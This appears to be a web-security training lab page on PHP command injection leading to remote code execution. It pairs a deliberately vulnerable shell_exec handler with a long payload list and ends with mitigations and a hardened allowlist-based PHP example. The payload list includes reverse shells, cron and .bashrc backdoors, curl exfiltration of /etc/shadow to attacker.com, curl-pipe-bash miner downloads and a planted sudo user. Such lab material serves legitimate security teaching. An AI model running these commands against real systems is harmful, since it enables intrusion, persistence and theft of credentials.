Lab 5: Command Injection with RCE

Command injection leading to Remote Code Execution

Difficulty: High

Lab Overview

This lab demonstrates the most dangerous form of command injection: user input is handed straight to a shell, so the attacker gains Remote Code Execution (RCE) on the server. RCE is the end goal of command injection attacks and represents the highest risk to applications.

Objective: Achieve Remote Code Execution through command injection vulnerabilities.

RCE Vulnerable Code
// Vulnerable: Direct execution leading to RCE
function execute_command_rce($command) {
    if (empty($command)) {
        return "No command specified.";
    }
    
    // Vulnerable: Direct execution using shell_exec
    $output = @shell_exec($command . ' 2>&1');
    
    if ($output === null) {
        return "Command execution failed or no output.";
    }
    
    return $output;
}
RCE Command Execution
⚠️ RCE WARNING

This lab demonstrates RCE vulnerabilities. The following can execute arbitrary commands:

  • whoami - Basic command
  • id; ls - Multiple commands
  • cat /etc/passwd - File reading
  • ps aux - Process listing
Available Commands

Try these basic commands:

  • whoami - Current user
  • id - User ID information
  • pwd - Current directory
  • ls - List files
  • uname -a - System information
Vulnerability Details
  • Type: Command Injection with RCE
  • Severity: Critical
  • Method: POST
  • Issue: Direct command execution leading to RCE
RCE Payloads
  • whoami - Basic RCE
  • id; ls - Multiple commands
  • cat /etc/passwd - File reading
  • ps aux - Process listing
Command Injection RCE Payloads

Use these payloads to achieve Remote Code Execution:

1. Basic RCE Payloads:
  • whoami
  • id
  • pwd
  • ls
  • uname -a
  • hostname
  • date
2. Information Gathering RCE:
  • whoami
  • id
  • pwd
  • uname -a
  • hostname
  • date
  • uptime
  • who
  • w
3. File System Access RCE:
  • ls -la
  • cat /etc/passwd
  • cat /etc/hosts
  • cat /etc/shadow
  • cat /proc/version
  • cat /proc/cpuinfo
  • cat /proc/meminfo
  • cat /proc/loadavg
4. Process and System Information RCE:
  • ps aux
  • ps -ef
  • netstat -an
  • ss -tuln
  • lsof -i
  • df -h
  • free -m
  • top
  • htop
5. Network Information RCE:
  • ifconfig
  • ip addr
  • route -n
  • arp -a
  • nslookup google.com
  • ping -c 3 8.8.8.8
  • traceroute google.com
  • nmap localhost
6. User and Permission Information RCE:
  • groups
  • sudo -l
  • crontab -l
  • history
  • env
  • printenv
  • who
  • w
  • last
  • lastlog
7. Multiple Command Execution RCE:
  • whoami; id; pwd
  • ls -la; cat /etc/passwd
  • ps aux; netstat -an
  • whoami && id && pwd
  • whoami || id || pwd
  • whoami | id | pwd
8. Command Substitution RCE:
  • echo $(whoami)
  • echo `id`
  • echo $(cat /etc/passwd)
  • echo `ls -la`
  • echo $(ps aux)
  • echo `netstat -an`
9. Pipe and Redirection RCE:
  • whoami | cat
  • id > /tmp/output.txt
  • ls -la | grep php
  • cat /etc/passwd | head -5
  • ps aux | grep apache
  • netstat -an | grep LISTEN
10. Environment Variables RCE:
  • echo $PATH
  • echo $HOME
  • echo $USER
  • echo $SHELL
  • echo $PWD
  • echo $HOSTNAME
  • echo $LANG
  • echo $TZ
11. File Operations RCE:
  • touch /tmp/test.txt
  • echo "test" > /tmp/test.txt
  • cat /tmp/test.txt
  • rm /tmp/test.txt
  • mkdir /tmp/testdir
  • rmdir /tmp/testdir
  • chmod 755 /tmp/test.txt
  • chown root /tmp/test.txt
12. Advanced Commands RCE:
  • find / -name "*.php" 2>/dev/null
  • grep -r "password" /var/www/ 2>/dev/null
  • find / -perm -4000 2>/dev/null
  • find / -writable 2>/dev/null
  • find / -type f -name "*.conf" 2>/dev/null
  • find / -name "*.log" 2>/dev/null
13. Reverse Shell RCE (Dangerous):
  • bash -i >& /dev/tcp/attacker.com/4444 0>&1
  • nc -e /bin/bash attacker.com 4444
  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
14. Persistence and Backdoors RCE:
  • echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' | crontab -
  • echo '*/5 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1' | crontab -
  • echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' >> ~/.bashrc
  • echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' >> /etc/profile
15. Data Exfiltration RCE:
  • cat /etc/passwd | curl -X POST -d @- http://attacker.com/steal
  • cat /etc/shadow | curl -X POST -d @- http://attacker.com/steal
  • ps aux | curl -X POST -d @- http://attacker.com/steal
  • netstat -an | curl -X POST -d @- http://attacker.com/steal
16. Lateral Movement RCE:
  • ssh user@target.com 'whoami'
  • ssh user@target.com 'id'
  • ssh user@target.com 'cat /etc/passwd'
  • ssh user@target.com 'ps aux'
  • ssh user@target.com 'netstat -an'
17. Cryptocurrency Mining RCE:
  • curl -s https://raw.githubusercontent.com/attacker/miner.sh | bash
  • wget -qO- https://raw.githubusercontent.com/attacker/miner.sh | bash
  • curl -s https://raw.githubusercontent.com/attacker/miner.sh | sh
  • wget -qO- https://raw.githubusercontent.com/attacker/miner.sh | sh
18. System Compromise RCE:
  • useradd -m -s /bin/bash hacker
  • echo 'hacker:password' | chpasswd
  • usermod -aG sudo hacker
  • echo 'hacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
Real-World Attack Scenarios
Mitigation Strategies
  • Implement proper input validation and sanitization
  • Use whitelist-based command validation
  • Avoid direct command execution functions
  • Use parameterized commands and safe APIs
  • Implement proper access controls and permissions
  • Regular security testing and vulnerability assessments
  • Monitor for unusual command execution patterns
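The following is an added example, not the lab's own code, showing what the mitigation list looks like applied to the execute_command_rce() handler above. Instead of passing user text to shell_exec(), the client sends a command name that is looked up in a server-side allowlist, any optional argument is checked against a strict pattern, and the program is started with the array form of proc_open() (PHP 7.4 or later), which executes the binary directly without a shell. Every decision is written to the log as a structured line so unexpected names or arguments stand out during review. The command names, binary paths, the hostname pattern and the audit() helper are assumptions made for this example.

```php
<?php
declare(strict_types=1);
// Added example (not the lab's own code): hardened replacement for
// execute_command_rce(). The request carries a command *name*, never a
// command string; user input never reaches /bin/sh.

/** Allowlist (assumed for this example): name => fixed argv + optional argument pattern. */
const ALLOWED_COMMANDS = [
    'whoami' => ['argv' => ['/usr/bin/whoami'], 'arg' => null],
    'uptime' => ['argv' => ['/usr/bin/uptime'], 'arg' => null],
    // One parameterised command: the host is the only user-controlled value.
    // The pattern also rejects a leading '-', so no extra ping options can be smuggled in.
    'ping'   => ['argv' => ['/bin/ping', '-c', '1'],
                 'arg'  => '/^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?$/'],
];

/** Structured audit line (assumed helper) so log review can spot rejected or unusual requests. */
function audit(string $event, string $name, ?string $arg, string $detail): void
{
    error_log(json_encode([
        'event'  => $event, 'name' => $name, 'arg' => $arg, 'detail' => $detail,
        'remote' => $_SERVER['REMOTE_ADDR'] ?? 'cli',
    ]));
}

/**
 * Validate and run one allowlisted command.
 * Returns [bool $ok, string $text]; the text never echoes raw user input.
 */
function run_allowed_command(string $name, ?string $arg = null): array
{
    if (!array_key_exists($name, ALLOWED_COMMANDS)) {
        audit('reject', $name, $arg, 'unknown command');
        return [false, 'Unknown command.'];
    }
    $spec = ALLOWED_COMMANDS[$name];
    $argv = $spec['argv'];

    if ($arg !== null && $arg !== '') {
        if ($spec['arg'] === null || preg_match($spec['arg'], $arg) !== 1) {
            audit('reject', $name, $arg, 'argument failed validation');
            return [false, 'Invalid argument.'];
        }
        // Appended as ONE argv element: "8.8.8.8; id" could only ever be a (rejected) hostname.
        $argv[] = $arg;
    }

    $descriptors = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $descriptors, $pipes);   // array form: executed without a shell
    if (!is_resource($proc)) {
        audit('error', $name, $arg, 'proc_open failed');
        return [false, 'Command execution failed.'];
    }
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);

    audit('run', $name, $arg, "exit=$status");
    return [$status === 0, $status === 0 ? $out : "Command failed (exit $status)."];
}

// Constructed demo inputs for the CLI; the web handler would read $_POST instead.
if (PHP_SAPI === 'cli') {
    $demo = [
        ['whoami', null],           // allowlisted name, runs
        ['whoami; id', null],       // the lab's "multiple commands" payload: not a known name
        ['ping', '8.8.8.8; id'],    // metacharacters in the argument: fails the pattern
        ['cat', '/etc/passwd'],     // not allowlisted at all
    ];
    foreach ($demo as [$n, $a]) {
        [$ok, $text] = run_allowed_command($n, $a);
        printf("%-24s -> %s %s\n", $n . ($a === null ? '' : " $a"), $ok ? 'OK ' : 'REJ', trim($text));
    }
}
```

The design choice worth noting is that the allowlist and the argv array do different jobs: the allowlist bounds what the feature can ever run, while the argv form of proc_open() guarantees that even a validated argument is delivered to the program as data rather than parsed by a shell. If the array form is not available, escapeshellarg() on each argument is the fallback, but it still relies on a shell being in the path, which is exactly what this lab shows going wrong.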